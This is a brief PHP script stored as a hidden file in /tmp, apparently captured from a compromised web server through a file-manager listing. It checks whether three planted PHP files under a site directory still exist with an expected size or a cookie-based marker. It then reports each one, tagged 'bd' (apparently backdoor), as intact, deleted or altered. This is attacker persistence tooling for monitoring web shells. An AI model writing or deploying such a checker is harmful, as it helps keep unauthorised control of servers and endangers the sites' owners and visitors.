Current File : //tmp/.created
<?php   $r = '/home/mak/_wildcard_.mak.pt'; $x = ["/ratcdqjc.php"=>"bd@@111923@@$_COOKIE[-",
"/cgi-bin_bkp.php"=>"bd@@100805@@7818",
"/wp.php"=>"bd@@112023@@1037"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');